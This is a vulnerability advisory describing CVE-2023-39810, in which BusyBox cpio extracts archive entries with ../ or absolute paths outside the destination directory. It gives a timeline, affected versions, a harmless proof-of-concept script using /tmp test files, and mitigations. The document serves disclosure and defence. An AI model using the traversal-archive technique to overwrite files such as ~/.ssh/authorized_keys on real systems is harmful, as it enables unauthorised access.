Busybox cpio directory traversal vulnerability (CVE-2023-39810)

Pentagrid AG

2023-08-28 10:00 (updated 2024-08-28 09:00)

When extracting cpio archives with BusyBox cpio, the cpio archiving tools may write files outside the destination directory and there is no option to prevent this.

Summary

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:L, 6.1 Medium

cpio is an archive format and also an archive handling tool. Several implementations exist, for example GNU cpio, bsdcpio, and BusyBox cpio. The BusyBox variant of cpio has been found to extract archives that contain relative file names with a ../ traversal pattern and this cannot be prevented.

While bsdcpio ignores archived files that have absolut file names or contain ../ and GNU cpio has a parameter to prevent extracting these file names, BusyBox processes archives with such names and there is no parameter to handle potentially untrusted archives.

Impact

If untrusted archives are extracted, this may result in writing files outside the destination directory. This could result in files being overwritten that contain configuration in form of shell scripts such as ~/.bashrc or that enable a login from a remote side such as the ~/.ssh/authorized_keys file.

Timeline

2023-07-24: Vulnerability noticed.
2023-07-26: Initial contact of BusyBox maintainer via e-mail.
2023-08-01: Second try to contact BusyBox maintainer via e-mail. First try to contact developer of the module, but e-mail bounced. First contact to Debian security team, because BusyBox package is available via Debian packages.
2023-08-24: CVE-2023-39810 was assigned.
2023-08-28: Advisory published after not being able to get in contact with maintainer or developer.
2024-08-20: A patch was published. See section Patches and Workaround.

Affected Components

The issue affects BusyBox cpio in multiple versions on different platforms. Pentagrid tested the following versions and could successfully reproduce the issue.

BusyBox v1.33.2
BusyBox v1.30.1

Technical Details

The processing of relative and absolute file names could result in risks. For example the GNU cpio program was affected by the same vulnerability, referenced as "CVE-2005-1229 - Directory traversal vulnerability in cpio 2.6 and earlier allows remote attackers to write to arbitrary directories via a .. (dot dot) in a cpio file." A patch was developed and added to cpio 2.6-6, which requires an additional parameter --no-absolute-filenames to prevent files being overwritten. This option also works for relative file names with ../ pattern. This is still an insecure default, but an improvement. However, some distributions seems to have reverted the patch.

BusyBox cpio is another implementation and it has no mechanism to avoid the processing of relative files with ../ pattern as shown with the proof of concept below:

#!/bin/sh

set -e

echo + Clean-up
rm -rf /tmp/testcase

echo + Create a test archive
mkdir -p /tmp/testcase/a/b/
echo test > /tmp/testcase/testfile

cd /tmp/testcase/a/b/
(echo ../../testfile; echo /etc/hostname) | cpio -ov -H newc -O /tmp/testcase/a/b/archive.cpio --quiet
rm /tmp/testcase/testfile

echo + Extract archive
mkdir /tmp/testcase/a/b/etc
strace -f busybox cpio -iv < archive.cpio 2>&1 | grep 'hostname\|testfile' | grep -v read

echo + List files
find /tmp/testcase/

The final find command lists extracted files:

/tmp/testcase/
/tmp/testcase/testfile           <-- extracted rel. file
/tmp/testcase/a
/tmp/testcase/a/b                <-- working directory
/tmp/testcase/a/b/etc
/tmp/testcase/a/b/etc/hostname   <-- extracted abs. file
/tmp/testcase/a/b/archive.cpio   <-- archive to extract

According to the output above, the testfile is written outside of the working directory.

Precondition

An untrusted archive is extracted with the BusyBox cpio tool and the running cpio process has permissions to write files outside the destination directory.

Recommendation

Pentagrid recommends changing the default behaviour and to ignore relative file names with ../ pattern within a cpio archive. To process files with a directory traversal pattern, a command line flag could be introduced like it was done for GNU cpio.

Patches and Workaround

Users can specify on the BusyBox cpio command line which file name should be unpacked, which should be safe as long as no directory traversal is included in that file name argument.

User may also consider using another cpio implementation or may ensure that archive files are trusted.

Peter Kästle implemented a patch for the BusyBox cpio command to filter relative file names. This patch was published via the BusyBox mailing list. However, at the time of updating this advisory, the patch was not merged into the BusyBox code base.

Credits

The vulnerability has been found by Tobias Ospelt and Martin Schobert of Pentagrid.